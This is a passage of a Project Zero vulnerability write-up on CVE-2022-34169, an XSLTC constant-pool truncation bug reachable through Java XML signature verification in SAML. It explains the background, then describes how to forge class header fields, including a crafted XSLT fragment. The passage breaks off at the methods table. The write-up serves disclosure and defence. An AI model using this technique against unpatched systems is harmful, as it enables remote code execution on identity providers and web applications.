This transparent disclosure of in-the-wild status is necessary both for the safety and autonomy of targeted users, so that they can protect themselves, and for the security industry, so that it can work together to best prevent these 0-days in the future.


Category: Hacking & Security

Gregor Samsa: Exploiting Java's XML Signature Verification

2 November 2022 - 12:41

By Felix Wilhelm, Project Zero


Earlier this year, I discovered a surprising attack surface hidden deep inside Java’s standard library: A custom JIT compiler processing untrusted XSLT programs, exposed to remote attackers during XML signature verification. This post discusses CVE-2022-34169, an integer truncation bug in this JIT compiler resulting in arbitrary code execution in many Java-based web applications and identity providers that support the SAML single-sign-on standard. 

OpenJDK fixed the discussed issue in July 2022. The Apache BCEL project used by Xalan-J, the origin of the vulnerable code, released a patch in September 2022.


While the vulnerability discussed in this post has been patched, vendors and users should expect further vulnerabilities in SAML.


From a security researcher's perspective, this vulnerability is an example of an integer truncation issue in a memory-safe language, with an exploit that feels very much like a memory corruption. While less common than the typical memory safety issues of C or C++ codebases, weird machines still exist in memory safe languages and will keep us busy even after we move into a bright memory safe future.


Before diving into the vulnerability and its exploit, I’m going to give a quick overview of XML signatures and SAML. What makes XML signatures such an interesting target and why should we care about them?

Introduction

XML Signatures are a typical example of a security protocol invented in the early 2000s. They suffer from high complexity, a large attack surface and a wealth of configurable features that can weaken or break their security guarantees in surprising ways. Modern usage of XML signatures is mostly restricted to somewhat obscure protocols and legacy applications, but there is one important exception: SAML. SAML, which stands for Security Assertion Markup Language, is one of the two main Single-Sign-On standards used in modern web applications. While its alternative, the OAuth-based OpenID Connect (OIDC), is gaining popularity, SAML is still the de-facto standard for large enterprises and complex integrations.


SAML relies on XML signatures to protect messages forwarded through the browser. This turns XML signature verification into a very interesting external attack surface for attacking modern multi-tenant SaaS applications. While you don’t need a detailed understanding of SAML to follow this post, interested readers can take a look at Okta's Understanding SAML writeup or the SAML 2.0 wiki entry to get a better understanding of the protocol.


SAML SSO logins work by exchanging XML documents between the application, known as the service provider (SP), and the identity provider (IdP). When a user tries to log in to an SP, the service provider creates a SAML request. The IdP looks at the SAML request, tries to authenticate the user and sends a SAML response back to the SP. A successful response will contain information about the user, which the application can then use to grant access to its resources.


In the most widely used SAML flow (known as SP Redirect Bind / IdP POST Response) these documents are forwarded through the user's browser using HTTP redirects and POST requests. To protect against modification by the user, the security critical part of the SAML response (known as Assertion) has to be cryptographically signed by the IdP. In addition, the IdP might require SPs to also sign the SAML request to protect against impersonation attacks.

This means that both the IdP and the SP have to parse and verify XML signatures passed to them by a potentially malicious actor. Why is this a problem? Let's take a closer look at the way XML signatures work:


XML Signatures

Most signature schemes operate on a raw byte stream and sign the data as seen on the wire. Instead, the XML signature standard (known as XMLDsig) tries to be robust against insignificant changes to the signed XML document. This means that changing whitespaces, line endings or comments in a signed document should not invalidate its signature. 


An XML signature consists of a special Signature element, an example of which is shown below:

<Signature>
  <SignedInfo>
    <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
    <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />
    <Reference URI="#signed-data">
       <Transforms>
       …
       </Transforms>
       <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />
       <DigestValue>9bc34549d565d9505b287de0cd20ac77be1d3f2c</DigestValue>
    </Reference>
  </SignedInfo>
  <SignatureValue>....</SignatureValue>
  <KeyInfo><X509Certificate>....</X509Certificate></KeyInfo>
</Signature>


  • The  SignedInfo child contains  CanonicalizationMethod and SignatureMethod elements as well as one or more Reference elements describing the integrity protected data. 

  • KeyInfo describes the signer key and can contain a raw public key, an X509 certificate or just a key id.

  • SignatureValue contains the cryptographic signature (using SignatureMethod) of the SignedInfo element after it has been canonicalized using CanonicalizationMethod. 


At this point, only the integrity of the SignedInfo element is protected. To understand how this protection is extended to the actual data, we need to take a look at the way Reference elements work: In theory the Reference URI attribute can either point to an external document (detached signature), an element embedded as a child (enveloping signature) or any element in the outer document (enveloped signature). In practice, most SAML implementations use enveloped signatures and the Reference URI will point to the signed element somewhere in the current document tree.


When a Reference is processed during verification or signing, the referenced content is passed through a chain of Transforms. XMLDsig supports a number of transforms, ranging from canonicalization and base64 decoding to XPath or even XSLT. Once all transforms have been processed, the resulting byte stream is passed into the cryptographic hash function specified with the DigestMethod element and the result is stored in DigestValue.

This way, as the whole Reference element is part of SignedInfo, its integrity protection gets extended to the referenced element as well. 


Validating an XML signature can therefore be split into two separate steps:

  • Reference Validation: Iterate through all embedded references and for each reference fetch the referenced data, pump it through the Transforms chain and calculate its hash digest. Compare the calculated Digest with the stored DigestValue and fail if they differ.

  • Signature Validation: First canonicalize the SignedInfo element using the specified CanonicalizationMethod algorithm. Calculate the signature of SignedInfo using the algorithm specified in SignatureMethod and the signer key described in KeyInfo. Compare the result with SignatureValue and fail if they differ.


Interestingly, the order of these two steps can be implementation specific. While the XMLDsig RFC lists Reference Validation as the first step, performing Signature Validation first can have security advantages as we will see later on.
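To make the two steps concrete, here is a minimal sketch using the standard javax.xml.crypto.dsig API that runs them separately. The class name, the throwaway RSA key and the tiny enveloped-signature document are assumptions made purely for illustration. The sketch uses SHA-256 rather than the SHA-1 algorithms from the example above, because newer JDKs may reject SHA-1 during validation.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.util.Collections;
import javax.xml.crypto.dsig.*;
import javax.xml.crypto.dsig.dom.DOMSignContext;
import javax.xml.crypto.dsig.dom.DOMValidateContext;
import javax.xml.crypto.dsig.spec.C14NMethodParameterSpec;
import javax.xml.crypto.dsig.spec.TransformParameterSpec;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Node;

// Hypothetical helper: signs a small document, then validates it in two steps.
final class TwoStepValidationSketch {
    static final String RSA_SHA256 = "http://www.w3.org/2001/04/xmldsig-more#rsa-sha256";

    /** Returns { signatureValidationResult, referenceValidationResult }. */
    static boolean[] signAndValidate() {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            dbf.setNamespaceAware(true);
            Document doc = dbf.newDocumentBuilder().parse(new ByteArrayInputStream(
                "<input><data>abc</data></input>".getBytes(StandardCharsets.UTF_8)));

            KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
            kpg.initialize(2048);
            KeyPair kp = kpg.generateKeyPair();

            // Build an enveloped signature over the whole document (URI "").
            XMLSignatureFactory fac = XMLSignatureFactory.getInstance("DOM");
            Reference ref = fac.newReference("",
                fac.newDigestMethod(DigestMethod.SHA256, null),
                Collections.singletonList(
                    fac.newTransform(Transform.ENVELOPED, (TransformParameterSpec) null)),
                null, null);
            SignedInfo si = fac.newSignedInfo(
                fac.newCanonicalizationMethod(CanonicalizationMethod.EXCLUSIVE,
                    (C14NMethodParameterSpec) null),
                fac.newSignatureMethod(RSA_SHA256, null),
                Collections.singletonList(ref));
            fac.newXMLSignature(si, null)
               .sign(new DOMSignContext(kp.getPrivate(), doc.getDocumentElement()));

            Node sigNode = doc.getElementsByTagNameNS(XMLSignature.XMLNS, "Signature").item(0);
            DOMValidateContext ctx = new DOMValidateContext(kp.getPublic(), sigNode);
            XMLSignature sig = fac.unmarshalXMLSignature(ctx);

            // Signature Validation: checks SignatureValue over the canonicalized SignedInfo.
            boolean signatureOk = sig.getSignatureValue().validate(ctx);

            // Reference Validation: dereference, run the Transforms, compare digests.
            boolean referencesOk = true;
            for (Object o : sig.getSignedInfo().getReferences()) {
                referencesOk &= ((Reference) o).validate(ctx);
            }
            return new boolean[] { signatureOk, referencesOk };
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }
}
```

In this sketch signature validation runs first, so the transforms inside a Reference are only executed once the SignedInfo signature has been checked.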


Correctly validating XML signatures and making sure the data we care about is protected is very difficult in the context of SAML. This will be a topic for later blog posts, but at this point we want to focus on the reference validation step:


As part of this step, the application verifying a signature has to run attacker controlled transforms on attacker controlled input. Looking at the list of transformations supported by XMLDsig, one seems particularly interesting: XSLT. 


XSLT, which stands for Extensible Stylesheet Language Transformations, is a feature-rich XML based programming language designed for transforming XML documents. Embedding an XSLT transform in an XML signature means that the verifier has to run the XSLT program on the referenced XML data.


The code snippet below gives you an example of a simple XSLT transformation. When executed, it fetches each <data> element stored inside <input>, grabs the first character of its content and returns it as part of its <output>. So <input><data>abc</data><data>def</data></input> would be transformed into <output><data>a</data><data>d</data></output>.

<Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
  <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns="http://www.w3.org/TR/xhtml1/strict" exclude-result-prefixes="foo"
   version="1.0">
    <xsl:output encoding="UTF-8" indent="no" method="xml" />
    <xsl:template match="/input">
      <output>
        <xsl:for-each select="data">
          <data><xsl:value-of select="substring(.,1,1)" /></data>
        </xsl:for-each>
      </output>
    </xsl:template>
  </xsl:stylesheet>
</Transform>
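If you want to try this transformation outside of a signature, the following sketch runs a simplified version of the stylesheet through the JDK's standard javax.xml.transform API. The class and method names are made up for this example, and the stylesheet drops the default namespace and the exclude-result-prefixes attribute of the snippet above to keep the output easy to read.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

// Hypothetical helper that applies the "first character" stylesheet to an input string.
final class FirstCharTransformSketch {
    static final String STYLESHEET =
        "<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">"
      + "<xsl:output method=\"xml\" encoding=\"UTF-8\" indent=\"no\""
      + " omit-xml-declaration=\"yes\"/>"
      + "<xsl:template match=\"/input\">"
      + "<output><xsl:for-each select=\"data\">"
      + "<data><xsl:value-of select=\"substring(.,1,1)\"/></data>"
      + "</xsl:for-each></output>"
      + "</xsl:template>"
      + "</xsl:stylesheet>";

    static String transform(String inputXml) {
        try {
            // Compile the stylesheet, then run it over the input document.
            Transformer transformer = TransformerFactory.newInstance()
                .newTransformer(new StreamSource(new StringReader(STYLESHEET)));
            StringWriter out = new StringWriter();
            transformer.transform(
                new StreamSource(new StringReader(inputXml)), new StreamResult(out));
            return out.toString();
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(transform("<input><data>abc</data><data>def</data></input>"));
    }
}
```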


Exposing a fully-featured language runtime to an external attacker seems like a bad idea, so let's take a look at how this feature is implemented in Java’s OpenJDK.


XSLT in Java

Java’s main entry point for working with XML signatures is the javax.xml.crypto.dsig.XMLSignature interface and its sign and validate methods. We are mostly interested in the validate method, whose OpenJDK implementation is shown below:


// https://github.com/openjdk/jdk/blob/master/src/java.xml.crypto/share/classes/org/jcp/xml/dsig/internal/dom/DOMXMLSignature.java
    @Override
    public boolean validate(XMLValidateContext vc)
        throws XMLSignatureException
    {
        [..]
        // validate the signature
        boolean sigValidity = sv.validate(vc); // (A)
        if (!sigValidity) {
            validationStatus = false;
            validated = true;
            return validationStatus;
        }

        // validate all References
        @SuppressWarnings("unchecked")
        List<Reference> refs = this.si.getReferences();
        boolean validateRefs = true;
        for (int i = 0, size = refs.size(); validateRefs && i < size; i++) {
            Reference ref = refs.get(i);
            boolean refValid = ref.validate(vc); // (B)
            LOG.debug("Reference [{}] is valid: {}", ref.getURI(), refValid);
            validateRefs &= refValid;
        }
        if (!validateRefs) {
            LOG.debug("Couldn't validate the References");
            validationStatus = false;
            validated = true;
            return validationStatus;
        }
        [..]
    }


As we can see, the validate method first validates the signature of the SignedInfo element in (A) before validating all the references in (B). This means that an attack against the XSLT runtime requires a valid signature for the SignedInfo element. We’ll discuss later how an attacker can bypass this requirement.


The call to ref.validate() in (B) ends up in the DOMReference.validate method shown below:

    public boolean validate(XMLValidateContext validateContext)
        throws XMLSignatureException
    {
        if (validateContext == null) {
            throw new NullPointerException("validateContext cannot be null");
        }
        if (validated) {
            return validationStatus;
        }
        Data data = dereference(validateContext); // (D)
        calcDigestValue = transform(data, validateContext); // (E)

        [..]
        validationStatus = Arrays.equals(digestValue, calcDigestValue); // (F)
        validated = true;
        return validationStatus;
    }




The code gets the referenced data in (D), transforms it in (E) and compares the digest of the result with the digest stored in the signature in (F). Most of the complexity is hidden behind the call to transform in (E) which loops through all Transform elements defined in the Reference and executes them.


As this is Java, we have to walk through a lot of indirection layers before we end up at the interesting parts. Take a look at the call stack below if you want to follow along and step through the code:


at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:584)
at com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl.newTransformer(TransformerFactoryImpl.java:818)
at com.sun.org.apache.xml.internal.security.transforms.implementations.TransformXSLT.enginePerformTransform(TransformXSLT.java:130)
at com.sun.org.apache.xml.internal.security.transforms.Transform.performTransform(Transform.java:316)
at org.jcp.xml.dsig.internal.dom.ApacheTransform.transformIt(ApacheTransform.java:188)
at org.jcp.xml.dsig.internal.dom.ApacheTransform.transform(ApacheTransform.java:124)
at org.jcp.xml.dsig.internal.dom.DOMTransform.transform(DOMTransform.java:173)
at org.jcp.xml.dsig.internal.dom.DOMReference.transform(DOMReference.java:457)
at org.jcp.xml.dsig.internal.dom.DOMReference.validate(DOMReference.java:387)
at org.jcp.xml.dsig.internal.dom.DOMXMLSignature.validate(DOMXMLSignature.java:281)


If we specify an XSLT transform and the org.jcp.xml.dsig.secureValidation property isn't enabled (we’ll come back to this later), we will end up in the file src/java.xml/share/classes/com/sun/org/apache/xalan/internal/xsltc/trax/TransformerFactoryImpl.java, which is part of a module called XSLTC.


XSLTC, the XSLT compiler, is originally part of the Apache Xalan project. OpenJDK forked Xalan-J, a Java based XSLT runtime, to provide XSLT support as part of Java’s standard library. While the original Apache project has a number of features that are not supported in the OpenJDK fork, most of the core code is identical and CVE-2022-34169 affected both codebases. 


XSLTC is responsible for compiling XSLT stylesheets into Java classes to improve performance compared to a naive interpretation based approach. While this has advantages when repeatedly running the same stylesheet over large amounts of data, it is a somewhat surprising choice in the context of XML signature validation. Thinking about this from an attacker's perspective, we can now provide arbitrary inputs to a fully-featured JIT compiler. Talk about an unexpected attack surface! 


A bug in XSLTC

    /**
     * As Gregor Samsa awoke one morning from uneasy dreams he found himself
     * transformed in his bed into a gigantic insect. He was lying on his hard,
     * as it were armour plated, back, and if he lifted his head a little he
     * could see his big, brown belly divided into stiff, arched segments, on
     * top of which the bed quilt could hardly keep in position and was about
     * to slide off completely. His numerous legs, which were pitifully thin
     * compared to the rest of his bulk, waved helplessly before his eyes.
     * "What has happened to me?", he thought. It was no dream....
     */
    protected final static String DEFAULT_TRANSLET_NAME = "GregorSamsa";

Turns out that the author of this codebase was a Kafka fan. 


So what does this compilation process look like? XSLTC takes an XSLT stylesheet as input and returns a JIT'ed Java class, called a translet, as output. The JVM then loads this class and constructs it, and the XSLT runtime executes the transformation via a JIT'ed method.


Java class files contain the JVM bytecode for all class methods, a so-called constant pool describing all constants used and other important runtime details such as the name of its super class or access flags. 


// https://docs.oracle.com/javase/specs/jvms/se18/html/jvms-4.html
ClassFile {
    u4             magic;
    u2             minor_version;
    u2             major_version;
    u2             constant_pool_count;
    cp_info        constant_pool[constant_pool_count-1]; // cp_info is a variable-sized object
    u2             access_flags;
    u2             this_class;
    u2             super_class;
    u2             interfaces_count;
    u2             interfaces[interfaces_count];
    u2             fields_count;
    field_info     fields[fields_count];
    u2             methods_count;
    method_info    methods[methods_count];
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}


XSLTC depends on the Apache Byte Code Engineering Library (BCEL) to dynamically create Java class files. As part of the compilation process, constants in the XSLT input such as Strings or Numbers get translated into Java constants, which are then stored in the constant pool. The following code snippet shows how an XSLT integer expression gets compiled: Small integers that fit into a byte or short are stored inline in bytecode using the bipush or sipush instructions. Larger ones are added to the constant pool using the cp.addInteger method:


// org/apache/xalan/xsltc/compiler/IntExpr.java
    public void translate(ClassGenerator classGen, MethodGenerator methodGen) {
        ConstantPoolGen cpg = classGen.getConstantPool();
        InstructionList il = methodGen.getInstructionList();
        il.append(new PUSH(cpg, _value));
    }

// org/apache/bcel/internal/generic/PUSH.java
    public PUSH(final ConstantPoolGen cp, final int value) {
        if ((value >= -1) && (value <= 5)) {
            instruction = InstructionConst.getInstruction(Const.ICONST_0 + value);
        } else if (Instruction.isValidByte(value)) {
            instruction = new BIPUSH((byte) value);
        } else if (Instruction.isValidShort(value)) {
            instruction = new SIPUSH((short) value);
        } else {
            instruction = new LDC(cp.addInteger(value));
        }
    }
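The selection logic above can be restated without any BCEL dependency. The sketch below is a standalone illustration, with an assumed class and method name, that only reports which kind of instruction would be chosen for a given integer. The last branch is the one that grows the constant pool.

```java
// Hypothetical restatement of the PUSH selection logic; it does not use BCEL.
final class PushSelectionSketch {
    /** Returns the mnemonic of the instruction that would carry the value. */
    static String chooseInstruction(int value) {
        if (value >= -1 && value <= 5) {
            // Dedicated one-byte opcodes exist for -1 through 5.
            return value == -1 ? "iconst_m1" : "iconst_" + value;
        } else if (value >= Byte.MIN_VALUE && value <= Byte.MAX_VALUE) {
            return "bipush";   // operand stored inline as one byte
        } else if (value >= Short.MIN_VALUE && value <= Short.MAX_VALUE) {
            return "sipush";   // operand stored inline as two bytes
        }
        return "ldc";          // value needs a new constant pool entry
    }

    public static void main(String[] args) {
        for (int v : new int[] { 3, 100, 1000, 100000 }) {
            System.out.println(v + " -> " + chooseInstruction(v));
        }
    }
}
```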


The problem with this approach is that neither XSLTC nor BCEL correctly limits the size of the constant pool. As constant_pool_count, which describes the size of the constant pool, is only 2 bytes long, its maximum size is limited to 2**16 - 1 or 65535 entries. In practice even fewer entries are possible, because some constant types take up two entries. However, BCEL's internal constant pool representation uses a standard Java array for storing constants, and does not enforce any limits on its length.

When XSLTC processes a stylesheet that contains more constants than this, and BCEL's internal class representation is serialized to a class file at the end of the compilation process, the array length is truncated to a short, but the complete array is written out.
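The truncation itself is easy to reproduce with the JDK's DataOutputStream, whose writeShort method only writes the low 16 bits of its int argument. The sketch below is not BCEL's serialization code, and the class and method names are assumptions. It only shows which count a class file reader would see for an oversized pool.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.UncheckedIOException;

// Hypothetical demonstration of a pool length being truncated to a u2.
final class PoolCountTruncationSketch {
    /** Writes the entry count as a u2 and returns the value a reader gets back. */
    static int countSeenByReader(int actualEntries) {
        try {
            ByteArrayOutputStream buffer = new ByteArrayOutputStream();
            DataOutputStream out = new DataOutputStream(buffer);
            out.writeShort(actualEntries);   // silently drops everything above 16 bits
            out.flush();
            DataInputStream in = new DataInputStream(
                new ByteArrayInputStream(buffer.toByteArray()));
            return in.readUnsignedShort();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.printf("0x%x%n", countSeenByReader(0x10703));
    }
}
```

With 0x10703 entries, the value used by the exploit later in this post, the reader sees a count of 0x703 and treats everything after that point as the rest of the class file.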

This means that constant_pool_count will now contain a small value and that parts of the attacker-controlled constant pool will get interpreted as the class fields following the constant pool, including method and attribute definitions. 

Exploiting a constant pool overflow

To understand how we can exploit this, we first need to take a closer look at the content of the constant pool.  Each entry in the pool starts with a 1-byte tag describing the kind of constant, followed by the actual data. The table below shows an incomplete list of constant types supported by the JVM (see the official documentation for a complete list). No need to read through all of them but we will come back to this table a lot when walking through the exploit. 

Each entry below lists the constant kind, its tag and a description, followed by its layout.

CONSTANT_Utf8 (tag 1): Constant variable-sized UTF-8 string value

CONSTANT_Utf8_info {
    u1 tag;
    u2 length;
    u1 bytes[length];
}

CONSTANT_Integer (tag 3): 4-byte integer

CONSTANT_Integer_info {
    u1 tag;
    u4 bytes;
}

CONSTANT_Float (tag 4): 4-byte float

CONSTANT_Float_info {
    u1 tag;
    u4 bytes;
}

CONSTANT_Long (tag 5): 8-byte long

CONSTANT_Long_info {
    u1 tag;
    u4 high_bytes;
    u4 low_bytes;
}

CONSTANT_Double (tag 6): 8-byte double

CONSTANT_Double_info {
    u1 tag;
    u4 high_bytes;
    u4 low_bytes;
}

CONSTANT_Class (tag 7): Reference to a class. Links to a Utf8 constant describing the name.

CONSTANT_Class_info {
    u1 tag;
    u2 name_index;
}

CONSTANT_String (tag 8): A JVM “String”. Links to a Utf8 constant.

CONSTANT_String_info {
    u1 tag;
    u2 string_index;
}

CONSTANT_Fieldref (tag 9), CONSTANT_Methodref (tag 10), CONSTANT_InterfaceMethodref (tag 11): Reference to a class field or method. Links to a Class constant.

CONSTANT_Fieldref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_Methodref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_InterfaceMethodref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_NameAndType (tag 12): Describes a field or method.

CONSTANT_NameAndType_info {
    u1 tag;
    u2 name_index;
    u2 descriptor_index;
}

CONSTANT_MethodHandle (tag 15): Describes a method handle.

CONSTANT_MethodHandle_info {
    u1 tag;
    u1 reference_kind;
    u2 reference_index;
}

CONSTANT_MethodType (tag 16): Describes a method type. Points to a Utf8 constant containing a method descriptor.

CONSTANT_MethodType_info {
    u1 tag;
    u2 descriptor_index;
}


A perfect constant type for exploiting CVE-2022-34169 would be dynamically sized and contain fully attacker-controlled content. Unfortunately, no such type exists. While CONSTANT_Utf8 is dynamically sized, its content isn’t a raw string representation but an encoding format the JVM calls “modified UTF-8”. This encoding introduces some significant restrictions on the data stored and rules out null bytes, making it mostly useless for corrupting class fields.


The next best thing we can get is a fixed size constant type with full control over the content. CONSTANT_Long seems like an obvious candidate, but XSLTC never creates attacker-controlled long constants during the compilation process. Instead we can use floating point numbers to create CONSTANT_Double entries with (almost) fully controlled content. This gives us a nice primitive where we can corrupt class fields behind the constant pool with a byte pattern like 0x06 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0x06 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0x06 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ.
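One way to think about this primitive is as a mapping between 8 chosen bytes and a decimal number literal. The sketch below, with assumed class and method names, converts a 64-bit pattern into an exact plain decimal string and back. It uses plain notation because XPath 1.0 number literals have no exponent syntax. It only shows the IEEE 754 side of the problem and makes no claim about how XSLTC itself parses number literals.

```java
import java.math.BigDecimal;

// Hypothetical helper: maps 8 chosen bytes to a decimal literal and back.
final class DoubleConstantSketch {
    /** Exact plain-decimal literal for the double encoded by the given bits. */
    static String literalFor(long bits) {
        double d = Double.longBitsToDouble(bits);
        if (Double.isNaN(d) || Double.isInfinite(d)) {
            // These bit patterns have no decimal literal: part of the "almost".
            throw new IllegalArgumentException("pattern is NaN or Infinity");
        }
        // new BigDecimal(double) is exact, so no bits are lost in the string.
        // Note: negative zero becomes "0" here and would lose its sign bit.
        return new BigDecimal(d).toPlainString();
    }

    /** The 8 bytes (as a long) that a CONSTANT_Double for this literal would hold. */
    static long bitsOf(String literal) {
        return Double.doubleToRawLongBits(Double.parseDouble(literal));
    }

    public static void main(String[] args) {
        long wanted = 0x0123000000000002L;  // arbitrary example pattern
        String literal = literalFor(wanted);
        System.out.println(literal.length() + " characters, round trip ok: "
            + (bitsOf(literal) == wanted));
    }
}
```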


Unfortunately, this primitive alone isn’t sufficient for crafting a useful class file due to the requirements of the fields right after the constant_pool:


    cp_info        constant_pool[constant_pool_count-1];
    u2             access_flags;
    u2             this_class;
    u2             super_class;


access_flags is a big endian mask of flags describing access permissions and properties of the class. 

While the JVM is happy to ignore unknown flag values, we need to avoid setting flags like ACC_INTERFACE (0x0200) or ACC_ABSTRACT (0x0400) that result in an unusable class. This means that we can’t use a CONSTANT_Double entry as our first out-of-bound constant as its tag byte of 0x06 will get interpreted as these flags.
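The flag problem is simple bit arithmetic. In the sketch below, whose class and method names are assumptions, a 0x06 byte in the high position of access_flags always sets both problematic flags, no matter which byte follows it.

```java
// Hypothetical check for the two class flags the exploit has to avoid.
final class AccessFlagsSketch {
    static final int ACC_INTERFACE = 0x0200;
    static final int ACC_ABSTRACT  = 0x0400;

    /** Combines two class file bytes into a big-endian u2 value. */
    static int u2(int high, int low) {
        return ((high & 0xFF) << 8) | (low & 0xFF);
    }

    /** True if neither ACC_INTERFACE nor ACC_ABSTRACT is set. */
    static boolean avoidsBadFlags(int accessFlags) {
        return (accessFlags & (ACC_INTERFACE | ACC_ABSTRACT)) == 0;
    }

    public static void main(String[] args) {
        // A CONSTANT_Double tag (0x06) as the first out-of-bounds byte.
        System.out.println(avoidsBadFlags(u2(0x06, 0x00)));
    }
}
```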


this_class is an index into the constant pool and has to point to a CONSTANT_Class entry that describes the class defined with this file. Fortunately, neither the JVM nor XSLTC cares much about which class we pretend to be, so this value can point to almost any CONSTANT_Class entry that XSLTC ends up generating. (The only restriction is that it can’t be a part of a protected namespace like java.lang.)


super_class is another index to a CONSTANT_Class entry in the constant pool. While the JVM is happy with any class, XSLTC expects this to be a reference to the org.apache.xalan.xsltc.runtime.AbstractTranslet class, otherwise loading and initialization of the class file fails.


After a lot of trial and error I ended up with the following approach to meet these requirements:


CONST_STRING    CONST_DOUBLE
0x08 0x07 0x02  0x06 0xXX 0xXX 0x00 0x00 0x00 0x00 0xZZ 0xZZ

access_flags      0x08 0x07
this_class        0x02 0x06
super_class       0xXX 0xXX
interfaces_count  0x00 0x00
fields_count      0x00 0x00
methods_count     0xZZ 0xZZ


  1. We craft an XSLT input that results in 0x10703 constants in the pool. This will result in a truncated pool size of 0x703 and the start of the constant at index 0x703 (due to 0 based indexing) will be interpreted as access_flags.

  2. During compilation of the input, we trigger the addition of a new string constant when the pool has 0x702 constants. This will first create a CONSTANT_Utf8 entry at index 0x702 and a CONSTANT_String entry at 0x703. The String entry will reference the preceding Utf8 constant, so its value will be the tag byte 0x08 followed by the index 0x07 0x02. This results in a usable access_flags value of 0x0807.

  3. Add a CONSTANT_Double entry at index 0x704. Its 0x06 tag byte will be interpreted as part of the this_class field. The following 2 bytes can then be used to control the value of the super_class field. By setting the next 4 bytes to 0x00, we create empty interfaces and fields arrays, before setting the last two bytes to the number of methods we want to define.


The only remaining requirement is that we need to add a CONSTANT_Class entry at index 0x206 of the constant pool, which is relatively straightforward. 
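To double check the alignment described above, the following sketch reads the 12 overlapping bytes the way a class file parser would, as six big-endian u2 fields. The class name, method names and the sample values passed for the super_class index and the method count are placeholders chosen for illustration, not values from the real exploit.

```java
import java.nio.ByteBuffer;

// Hypothetical parser for the six u2 header fields that follow the constant pool.
final class HeaderOverlaySketch {
    /** Bytes of the CONSTANT_String entry followed by the CONSTANT_Double entry. */
    static byte[] overlay(int superClassIndex, int methodsCount) {
        return new byte[] {
            0x08, 0x07, 0x02,                         // CONSTANT_String: tag, string_index 0x0702
            0x06,                                     // CONSTANT_Double tag
            (byte) (superClassIndex >> 8), (byte) superClassIndex,
            0x00, 0x00, 0x00, 0x00,                   // empty interfaces and fields
            (byte) (methodsCount >> 8), (byte) methodsCount
        };
    }

    /** Returns access_flags, this_class, super_class, interfaces_count, fields_count, methods_count. */
    static int[] parseHeader(byte[] bytes) {
        ByteBuffer buf = ByteBuffer.wrap(bytes);      // ByteBuffer is big-endian by default
        int[] fields = new int[6];
        for (int i = 0; i < fields.length; i++) {
            fields[i] = buf.getShort() & 0xFFFF;
        }
        return fields;
    }

    public static void main(String[] args) {
        for (int field : parseHeader(overlay(0x0123, 2))) {
            System.out.printf("0x%04x%n", field);
        }
    }
}
```

The second field comes out as 0x0206, which is why the CONSTANT_Class entry has to sit at index 0x206.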


The snippet below shows part of the generated XSLT input that will overwrite the first header fields. After filling the constant pool with a large number of string constants for the attribute fields and values, the CONST_STRING entry for the `jEb` element ends up at index 0x703. The XSLT function call to the `ceiling` function then triggers the addition of a controlled CONST_DOUBLE entry at index 0x704:


<jse jsf='jsg' … jDL='jDM' jDN='jDO' jDP='jDQ' jDR='jDS' jDT='jDU' jDV='jDW' jDX='jDY' jDZ='jEa' /><jEb />


<xsl:value-of select='ceiling(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008344026969402015)'/>


We constructed the initial header fields and are now in the interesting part of the class file definition: the methods table. This is where all methods of a class and their bytecode are defined. After XSLTC generates a Java class, the XSLT runtime will load the class and instantiate an object, so the easiest way to achieve arbitrary code execution is to create a malicious constructor. Let’s take a look at the methods table to see how we can define a working constructor:


ClassFile {
    [...]
    u2             methods_count;
    method_info    methods[methods_count];
    [...]
}

method_info {
    u2             access_flags;
    u2             name_index;
    u2             descriptor_index;
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}

attribute_info {
    u2 attribute_name_index;
    u4 attribute_length;
    u1 info[attribute_length];
}

Code_attribute {
    u2 attribute_name_index;
    u4 attribute_length;
    u2 max_stack;
    u2 max_locals;
    u4 code_length;
    u1 code[code_length];
    u2 exception_table_length;
    {   u2 start_pc;
        u2 end_pc;
        u2 handler_pc;
        u2 catch_type;
    } exception_table[exception_table_length];
    u2 attributes_count;
    attribute_info attributes[attributes_count];
}



The methods table is a dynamically sized array of method_info structs. Each of these structs describes the access_flags of the method, an index into the constant pool that points to its name (a CONSTANT_Utf8 entry), and another index pointing to the method descriptor (another CONSTANT_Utf8).

This is followed by the attributes table, a dynamically sized map from Utf8 keys stored in the constant pool to dynamically sized values stored inline. Fortunately, the only attribute we need to provide is the Code attribute, which contains the actual bytecode of the method.



